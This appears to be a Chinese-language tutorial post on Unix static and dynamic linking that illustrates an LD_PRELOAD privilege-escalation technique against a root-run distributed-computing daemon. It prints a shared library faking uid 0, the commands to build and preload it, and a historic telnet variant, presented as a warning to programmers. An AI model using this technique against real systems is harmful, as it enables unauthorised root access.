一般来说,Unix操作系统程序的链接分为静态链接和动态链接,静态链接就是把所有所引用到的函数或变量全部地编译到可执行文件中。动态链接则不会把函数编译到可执行文件中,而是在程序运行时动态地载入函数库,也就是运行链接。
让我们来一个Unix操作系统示例(这个示例来源于我的工作)。这个软件是一个分布式计算平台,软件在所有的计算机上都有以ROOT身份运行的侦听程序(Daemon),用户可以把的一程序从A计算机提交到B计算机上去运行。
这些Daemon会把用户在A计算机上的所有Unix操作系统环境变量带到B计算机上,在B计算机上的Daemon会fork出一个子进程,并且Daemon会调用seteuid、setegid来设置子程的执行宿主,并在子进程空间中设置从A计算机带过来的环境变量,以仿真用户的运行环境。(注意:A和B都运行在NIS/NFS方式上)
于是,我们可以写下这样的动态链接库:
- /* 文件名:preload.c */
- #include <dlfcn.h>
- #include <unistd.h>
- #include <sys/types.h>
- uid_t geteuid( void ) { return 0; }
- uid_t getuid( void ) { return 0; }
- uid_t getgid( void ) { return 0; }
在这里我们可以看到,我们重载了Unix操作系统调用。于是我们可以通过设置LC_PRELOAD来迫使主程序使用我们的geteuid/getuid/getgid(它们都返回0,也就是Root权限)。这会导致,上述的那个分布式计算平台的软件在提交端A计算机上调用了geteuid得到当前用户ID是0,并把这个用户ID传到了执行端B计算机上,于是B计算机上的Daemon就会调用seteuid(0),导致我们的程序运行在了Root权限之下。从而,用户取得了超级用户的权限而为所欲为。
上面的这个preload.c文件也就早期的为人所熟知的hack程序了。恶意用户通过在系统中设计LC_PRELOAD环境变量来加载这个动态链接库,会非常容易影响其它Unix操作系统命令(如:/bin/sh, /bin/ls, /bin/rm 等),让这些系统命令以Root权限运行。
让我们看一下这个函数是怎么影响Unix操作系统命令的:
- $ id
- uid=500(hchen) gid=10(wheel) groups=10(wheel)
- $ gcc -shared -o preload.so preload.c
- $ setenv LD_PRELOAD ./preload.so
- $ id
- uid=0(root) gid=0(root) egid=10(wheel) groups=10(wheel)
- $ whoami
- root
- $ /bin/sh
- # <------ 你可以看到命令行提示符会由 $ 变成 #
下面是一个曾经非常著名的系统攻击
- $ telnet
- telnet> env def LD_PRELOAD /home/hchen/test/preload.so
- telnet> open localhost
- #
当然,这个安全BUG早已被Fix了(虽然,通过id或是whoami或是/bin/sh让你觉得你像是root,但其实你并没有root的权限),当今的Unix操作系统中不会出现这个的问题。但这并不代表,我们自己写的程序,或是第三方的程序能够避免这个问题,尤其是那些以Root方式运行的第三方程序。所以,在我们编程时,我们要随时警惕着LD_PRELOAD。
关于Unix操作系统的示例我们就举出这个来给大家参考。
【编辑推荐】
